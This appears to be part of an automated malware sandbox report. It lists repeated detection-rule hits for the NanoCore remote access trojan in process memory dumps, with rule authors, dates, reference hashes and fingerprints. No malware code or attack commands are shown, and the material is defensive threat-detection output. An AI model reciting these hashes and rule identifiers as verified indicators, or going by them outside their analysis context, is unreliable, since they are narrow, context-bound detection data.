      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
